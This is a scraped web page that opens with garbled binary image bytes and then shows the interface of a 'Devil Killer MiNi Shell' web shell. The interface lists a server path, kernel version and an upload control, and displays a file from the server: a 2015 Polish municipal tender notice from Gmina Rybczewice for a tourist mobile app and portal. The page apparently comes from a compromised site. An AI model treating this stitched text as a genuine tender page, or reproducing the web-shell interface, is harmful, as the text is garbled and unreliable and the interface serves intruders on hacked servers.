JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151120/314070-N-2015.html

<p class="kh_header"><b>Rybczewice: Opracowanie turystycznej aplikacji mobilnej wraz z portalem internetowym w ramach projektu pn. Marka lokalna szansą rozwoju przedsiębiorczości na Szlacheckim Szlaku w województwie lubelskim</b><br>
<b>Numer ogłoszenia: 314070 - 2015; data zamieszczenia: 20.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Rybczewice , Rybczewice Drugie 119, 21-065 Rybczewice, woj. lubelskie, tel. 081 58 44 460, faks 081 58 44 474.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rybczewice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie turystycznej aplikacji mobilnej wraz z portalem internetowym w ramach projektu pn. Marka lokalna szansą rozwoju przedsiębiorczości na Szlacheckim Szlaku w województwie lubelskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa polegająca na opracowaniu turystycznej aplikacji mobilnej na systemy Android i iOS wraz z portalem internetowym dla sześciu gmin Szlaku Jana III Sobieskiego w ramach projektu pn. Marka lokalna szansą rozwoju przedsiębiorczości na Szlacheckim Szlaku w województwie lubelskim, współfinansowanego przez Szwajcarię w ramach szwajcarskiego programu współpracy z nowymi krajami członkowskimi Unii Europejskiej. Projekt jest realizowany przez Gminę Mełgiew w partnerstwie z gminami: Piaski, Rybczewice, Wólka, Spiczyn, Gorzków.2. Cel opracowania portalu i aplikacji mobilnej: Turystyczna aplikacja mobilna oraz portal internetowy dla subregionu Szlaku Jana III Sobieskiego ma pełnić rolę merytoryczną (baza wiedzy) oraz angażującą społeczność skupioną wokół aktywności oraz atrakcji oferowanych przez gminy: Mełgiew, Piaski, Rybczewice, Wólka, Spiczyn, Gorzków. Funkcje społecznościowe obejmują wtyczki społecznościowe: Facebook (like-box, share-box), Twitter, Pinterest, wyślij mailem. Dzięki temu dedykowany portal i aplikacja będzie nie tylko encyklopedią, zbiorem opisów oraz zdjęć, ale przede wszystkim będzie angażował swoich użytkowników. Ważnym elementem portalu i aplikacji będzie interaktywna mapa subregionu sześciu gmin z zaznaczonymi atrakcjami podzielonymi na kategorie. Po kliknięciu w daną lokalizację uzyska się więcej informacji na temat miejsca - opis, historia, ciekawostki, ceny, multimedia (np. filmy promocyjne). Rozwiązanie to umożliwi turyście zaplanowanie trasy zwiedzania, na podstawie udostępnionych informacji będzie on także mógł zaznaczyć miejsca, które chce odwiedzić. Z kolei wybierając którąś z tras, będzie mógł wydrukować gotowy miniprzewodnik lub dzięki aplikacji skorzystać z niej w trybie offline lub online na swoim smartfonie i rozpocząć aktywność turystyczną według własnych preferencji.
Serwis musi być dostępny w dwóch wersjach, zwykłej i mobilnej, zawierających tę samą treść lub wykonanie go jako responsywnej strony, tzn. takiej, która sama dostosowuje się do wielkości ekranu, niezależnie od tego, czy jest to ekran komputera, tabletu bądź smartfona. Serwis musi także być dostępny w dwóch wersjach językowych, polskiej oraz angielskiej.3. W zakres zamówienia wchodzi:I.	Baza danych. 1). Funkcjonalności: a) internetowa baza danych oparta na MySQL zawierająca możliwość kategoryzowania danych, tworzenia i filtrowania po parametrach (od strony interfejsu), łączenia obiektów w agregaty. Parametry przypisane do danego agregatu mogą być globalne (dla wszystkich agregatów) oraz charakterystyczne (tylko dla danego agregatu), b) możliwość tworzenia relacji między obiektami a trasami oraz obiektami a wydarzeniami,c) możliwość poszerzania o kolejne wpisy dodawane przez użytkowników, pod warunkiem autoryzacji wpisu przez administratora, d)	prezentacja 15-20 tras tematycznych (ok. 150 punktów POI) opracowanych merytorycznie przez Wykonawcę po obszarze gmin: Rybczewice, Piaski, Mełgiew, Spiczyn, Wólka, Gorzków (przykładowe tematy: (Szlak Jana III Sobieskiego, wąwozy, źródła i dwory). Każda trasa będzie składała się z nazwy, parametrów opisowych (długość, rodzaj, czas przebycia) śladu GPX wraz z listą waypointów (punktów na trasie) oraz opisu. Wizytówka tras (szlaki i wycieczki) będzie składać się z: nazwy, parametrów opisujących (rodzaj, długość, trudność, czas etc.) zdjęć, opisu oraz pliku GPX z śladem (nagranym w terenie) wraz z zaznaczonymi waypointami, ich opisami i zdjęciami. Plik GPX naniesiony zostanie na mapę. Szlaki mają być prezentacją wycieczki-gotowego pomysłu na spędzenie dnia-dwóch dni na terenie subregionu sześciu gmin. Mogą to być zaplanowane co do czasu pomysły na zwiedzanie (przykład: przyjazd o godz. 9 do miejsca X, śniadanie/poranna kawa (moduł w aplikacji wyświetlający najbliższe kawiarnie), następnie trasa tematyczna (moduł zobacz jeszcze w okolicy), zakończenie trasy w punkcie Y (moduł gdzie zjeść, moduł inne atrakcje: np. na popołudnie: np. miejsca piknikowe dla dzieci, atrakcje na wieczór: np. basen, kino etc.), e) prezentacja opracowanych merytorycznie przez Wykonawcę 5-10 questów terenowych po subregionie sześciu gmin, f) prezentacja wszystkich treści będzie dwujęzyczna: polska i angielska. Wykonawca zapewni profesjonalne tłumaczenie wykonane przez dyplomowanych tłumaczy języka angielskiego mających doświadczenie w tłumaczeniu tekstów o tematyce turystycznej oraz korektę native speakera (osoby dla której język angielski jest językiem ojczystym). 2). Zarządzenie treścią: a) baza danych będzie wspólną dla wszystkich komponentów systemu. Wszystkie rekordy będą pojawiać się z jednego centrum, a ich aktualizacja będzie się odbywać z poziomu jednego, wspólnego CMS, b) system zarządzania treścią będzie wspólny dla bazy danych portalu i aplikacji. System ma umożliwiać administrowanie treścią przez kilku użytkowników, c)	baza danych będzie kompatybilna z pozostałymi elementami sytemu czyli portalem i aplikacją mobilną. 3). Dane do bazy: a) Wykonawca wprowadzi do bazy co najmniej 150 obiektów (rekordów POI) dotyczących obiektów (przyrodniczych, historycznych, kulturalnych, noclegowych, gastronomicznych, rozrywkowych) znajdujących na obszarze sześciu gmin Szlaku Jana III Sobieskiego (Rybczewice, Piaski, Mełgiew, Spiczyn, Wólka, Gorzków). b)	każdy z rekordów ma zawierać takie informacje jak: nazwa, współrzędne GPS wraz zaznaczoną pozycją na mapie, dane teleadresowe (adres, adres e-mail, strona WWW, nr telefonu), godziny otwarcia, zdjęcia (1-4 na obiekt), opis oraz parametry opisowe do bazy, c) baza danych zostanie opracowana na podstawie wytycznych i materiałów dostarczonych przez Zamawiającego, d) Zamawiający zleca Wykonawcy pozyskanie informacji (opisy, zdjęcia, lokalizacja GPS, tłumaczenia) w ilości:teksty do portalu i aplikacji - ok. 90 stron A4 (1800 znaków na stronie) - opis ok. 15-20 tras turystycznych propozycji wycieczek + opis ok. 150 POI + ok. 25 stron A4 dla 10 questów gier terenowych opracowanych merytorycznie w formie wierszowanej, zgodnej z ideą questingu. Wykonawca odbędzie min 2 całodzienne spotkania warsztatowe na terenie sześciu gmin  obejmujące warsztaty i szkolenie społeczności lokalnej w obsłudze i funkcjonowaniu questów, zdjęcia - ok. 100 fotografii wykonanych na opisywanych trasach w bardzo dobrych warunkach pogodowych traki gpx, zapis ok. 200-300 km tras opisywanych tras (ok. 15-20 km na trasę) oraz ok. 150 POI, a także 10 questów. Dodatkowo Wykonawca zobowiązuje się przetestować questy w terenie po ich wykonaniu, tłumaczenia tekstów i wszystkich informacji zawartych na portalu i w aplikacjach na język angielski - wymagane profesjonalne tłumaczenie wykonane przez dyplomowanych tłumaczy języka angielskiego mających doświadczenie w tłumaczeniu tekstów o tematyce turystycznej wraz z korektą native speakera. Wykonawca powinien założyć ok., 120 stron A4 (1800 znaków) do tłumaczenia na język angielski, w części questowej stylizowana mapa 3D obszaru sześciu gmin wykonana przez Wykonawcę w 3-ch poziomach detali. Wykonawca umieści na mapie około 50 budowli i obiektów charakterystycznych w postaci grafiki animowanej.e) Wykonawca wygeneruje Zamawiającemu ok. 80 QR kodów kierujących do wskazanych przez Zamawiającego stron w aplikacji i lub WWW. II. Portalu internetowego. 1). Funkcjonalności: a) możliwość atrakcyjnego zaprezentowania walorów (przyrodniczych, historycznych, kulturowych, gastronomicznych, noclegowych, rozrywkowych) obszaru sześciu gmin Szlaku Jana III Sobieskiego,
b) propozycje spędzenia wolnego czasu na terenie sześciu przez możliwość wykorzystania tras tematycznych, c) informacje o aktualnych wydarzeniach kulturalnych i rekreacyjnych, d) planner - filtrujący z bazy danych informacje służące zaplanowaniu wycieczki po obszarze sześciu gmin, za jego pomocą użytkownik będzie mógł ustalić swoje preferencje dotyczące miejsc które chce odwiedzić, rodzaju aktywności, odległości, czasu trwania etc. Możliwość pobrania w formie śladu GPS skonfigurowanej trasy wycieczki. Przykładowe filtry: miejscowość (miejscowość oraz obszar znajdujący się w promieniu 50km), ilość dni (suwak: od 1 godziny do 1 tygodnia), transport:samochód,rower,pieszo, atrakcje, itp. e) mapa trójwymiarowa, animowana i zawierająca stylizowane kluczowe obiekty Szlaku Sobieskiego  z uwzględnieniem ich rzeczywistych pozycji GPS. Mapa wyświetlałby także pozycję innych uczestników gry terenowej w czasie ich pobytu w obszarze, oraz informacje o ich postępie w grze. (co tworzy aspekt rywalizacji) f)	możliwość pobrania aplikacji mobilnej w postaci odnośników do sklepów: Google Play i App Store, g)	możliwość wstawiania przez administratora i moderatora filmów z serwisu youtube, h) Social Media:możliwość dzielenia się treściami w serwisach społecznościowych, możliwość przekierowania do oficjalnych profili subregionu prowadzonych na najpopularniejszych serwisach (np. Facebook, Twitter, Pinterest, Google +), Facebook Like Box - okno zawierające wpisy dotyczące subregionu na Facebooku, i) Newsletter:możliwość zapisu na newsletter, możliwość wysyłki aktualnych ofert, promocji, aktualności i zapowiedzi ważnych wydarzeń, informacja o dostępności kodów QR przy atrakcjach subregionu, prognoza pogody w subregionie. j) możliwość dostosowania layout portalu internetowego do potrzeb osób niedowidzących: zdefiniowanie kontrastowych styli tła i czcionek oraz stworzenie menu umożliwiających ich zmianę, nie blokowanie możliwości powiększania czcionek w przeglądarce.2). CMS - system zarządzania treścią: a)	dostępny z poziomu przeglądarki,b)	różne poziomy dostępu (super administrator, administrator, moderator, end-user), zarządzanie uprawnieniami,
c) tworzenie, usuwanie, edytowanie treści: miejsca, obiekty, artykuły, galerie (zdjęciowe oraz filmowe), wydarzenia, d)	umożliwienie importowania danych ze wskazanych miejsc, które należą lub są powiązane z zamawiającym,
e) maksymalna możliwa dowolność zarządzania kategoriami, grupowaniem obiektów, tworzeniem parametrów opisowych (charakterystycznych dla danych typów obiektu),
f) eksport treści do wszystkich komponentów systemu, g) możliwa podmiana pewnych określonych elementów graficznych, h) zarządzanie multimediami, i) obsługa dwóch wersji językowych, j) edytor tekstu wraz z obsługą html w standardzie WYSIWYG, k) możliwość utworzenia iframe wlepki portalu na innych stronach (fragment kodu html wstawiony do kodu innej strony), l) zarządzanie wszystkimi komponentami systemu (baza danych, portal, aplikacja mobilna). III. Aplikacji na systemy iOS oraz Android. 1).	Zawartość merytoryczna aplikacji: a) informacje o atrakcjach obszaru sześciu gmin Szlaku Jana III Sobieskiego, b) ekran główny - strona główna podzielona na kategorie główne: np. miejsca (obiekty), trasy, artykuły informacje aktualności, czytników kodów QR, gry terenowe -questy,
c) trasy tematyczne po obszarze sześciu gmin prezentujące: opis, zdjęcia, profil wysokościowy trasy połączony z geolokalizacją GPS, d) wykorzystanie GPS,
e) działanie w trybie online i offline f) stylizowana mapa 3D obszaru sześciu gmin z zaznaczonymi wszystkimi obiektami oraz pozycją użytkownika GPS. g) wizytówki obiektów wpisanych do bazy, h) czytnik kodów QR, za pomocą którego, po zeskanowaniu kodu, użytkownik będzie mógł otworzyć dowolną stronę internetową lub stronę w aplikacji, 2). Funkcjonalność: a) planer - możliwość stworzenia swojego własnego planu zwiedzania - dodawanie obiektów do planera oraz wyświetlanie ich na mapie. b) moduł questowy - gier terenowych. Sposób działania questów w aplikacji mobilnej:z ekranu głównego użytkownik wybiera quest, na ekranie wstępnym pojawiają się podstawowe informacje dotyczące questu wraz z mapą dojazdową do punktu startowego, po zapoznaniu się z informacjami podstawowymi i dotarciu do punktu startowego użytkownik rozpoczyna quest.Quest jest podzielony na etapy - zagadki. Każda zagadka składa się z: części dotyczącej lokalizacji zagadki - wskazuje miejsce zagadki - miejsce to wyświetla się na mapie. Dzięki zastosowaniu GPS użytkownik widzi odległość swojej pozycji od punktu zagadki. Gdy użytkownik znajdzie się w promieniu 25 metrów tego miejsca otrzymuje powiadomienie dźwiękowe o tym fakcie oraz dostaje dostęp do zagadki, zagadki właściwej - zagadkę rozwiązuje wpisując hasło, które należy odgadnąć będąc w miejscu zadania. Po rozwiązaniu zagadki aktywuje się przycisk następna i pojawia się na mapie przejście do następnego miejsca zadania. W przypadku, gdy użytkownik nie może sobie poradzić z danym zadaniem może je rozwiązać automatycznie klikając w ikonę podpowiedzi (pomoc). Quest kończy się wpisaniem kodu, który jest dostępny w miejscu ostatniej zagadki questu. Miejsca zagadek mogą być ilustrowane zdjęciami. Dodatkowo aplikację trzeba wzbogacić modułem ciekawe miejsca - przewodnikiem po atrakcjach turystycznych okolic questu. 3). Szczegółowe parametry: a) aplikacje natywna, b) wersje systemów: iOS 6, Android 2.3 i wyższe, c) szata graficzna dostosowana do wytycznych Zamawiającego, d) aplikacja korzysta z ogólnie dostępnych podkładów mapowych oraz z mapy stylizowanej w części questowej, e) obiekty podzielone na kategorie, f) możliwości sortowania danych, g) wizytówka obiektu oprócz elementów opisanych przy bazie danych posiada funkcjonalności dzielenia się w serwisach społecznościowych, h) możliwość wyboru numeru telefonu powoduje połączenie telefoniczne z poziomu aplikacji, i)	możliwość przejścia między wizytówkami (tzw. wiązanie obiektów) w relacji trasa - obiekty oraz wydarzenie - obiekt, j)	obsługa galerii z multitouch oraz zdjęć panoramicznych, k) wykorzystanie GPS, l) obsługa filmów z serwisów zewnętrznych - przede wszystkim youtube, m) czytnik kodów QR, n) obsługa powiadomień push, o) wspólny system zarządzania treścią dla aplikacji, portalu i bazy danych. Dokładny sposób działania poszczególnych funkcjonalności oraz konkretne rozwiązania ich realizacji zostaną doprecyzowane na etapie projektu funkcjonalnego. Wybrane docelowo rozwiązania mogą różnić się sposobem działania od opisanych w niniejszym dokumencie z zastrzeżeniem, że nie mogą wpływać na koszt realizacji zamówienia i ostateczną wartość oferty Wykonawcy. W przypadku wystąpienia w opisie przedmiotu zamówienia znaków towarowych lub nazw własnych dopuszcza się zastosowanie rozwiązań równoważnych.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 72.41.30.00-8, 72.21.20.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.04.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Jako spełniający warunki udziału w postępowaniu zostaną ocenieni wykonawcy, którzy:wykażą wykonanie: a)	minimum 1 portalu internetowego z trasami turystycznymi i interaktywną mapą zrealizowanych wraz z aplikacją natywną na urządzenia mobilne i opartych na CMS (system do zarządzania treścią), b)	minimum 1 aplikacji natywnej na urządzenia mobilne o podobnym przedmiocie zamówienia do przedmiotu niniejszego postępowania czyli turystycznej aplikacji mobilnej obsługującej pobieranie mapy do trybu offline i posiadającej funkcjonalności obsługi bazy danych miejsc, wydarzeń i tras gdzie każda z tych aplikacji jest wykonana na 2 systemy Android i iOS, posiadającej funkcję obsługującą gry terenowe w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Jako spełniający warunki udziału w postępowaniu zostaną ocenieni wykonawcy, którzy: wykażą, że będą dysponować odpowiednimi osobami które będą wykonywać zamówienie, w tym co najmniej: a) minimum 1 programista, który posiada wykształcenie wyższe informatyczne, minimum 5 letnie doświadczenie zawodowe w zakresie tworzenia aplikacji mobilnych z interaktywną mapą trójwymiarowa,
b) minimum 1 grafik, który posiada wykształcenie wyższe o profilu artystycznym, minimum 5 letnie doświadczenie zawodowe w zakresie tworzeniu map 3D na urządzenia mobilne</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>6.3.2.1.	Wykaz winien wskazywać wykonanie minimum 1 portalu internetowego z trasami turystycznymi i interaktywną mapą zrealizowanych wraz z aplikacją natywną na urządzenia mobilne i opartych na CMS (system do zarządzania treścią) i minimum 1 aplikacji natywnej na urządzenia mobilne o podobnym przedmiocie zamówienia do przedmiotu niniejszego postępowania czyli turystycznej aplikacji mobilnej obsługującej pobieranie mapy do trybu offline i posiadającej funkcjonalności obsługi bazy danych miejsc, wydarzeń i tras gdzie każda z tych aplikacji jest wykonana na 2 systemy Android i iOS, posiadającej funkcję obsługującą gry terenowe w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie. 6.3.2.2.	Złożone poświadczenia winny potwierdzać należyte wykonanie  minimum 1 portalu internetowego z trasami turystycznymi i interaktywną mapą zrealizowanych wraz z aplikacją natywną na urządzenia mobilne i opartych na CMS (system do zarządzania treścią) i minimum 1 aplikacji natywnej na urządzenia mobilne o podobnym przedmiocie zamówienia do przedmiotu niniejszego postępowania czyli turystycznej aplikacji mobilnej obsługującej pobieranie mapy do trybu offline i posiadającej funkcjonalności obsługi bazy danych miejsc, wydarzeń i tras gdzie każda z tych aplikacji jest wykonana na 2 systemy Android i iOS, posiadającej funkcję obsługującą gry terenowe w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - 13.2.	Autorski szkic linii graficznej aplikacji i portalu zawierający fragmentem mapy 3D  wraz z opisem koncepcji architektury strony i aplikacji - 40</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
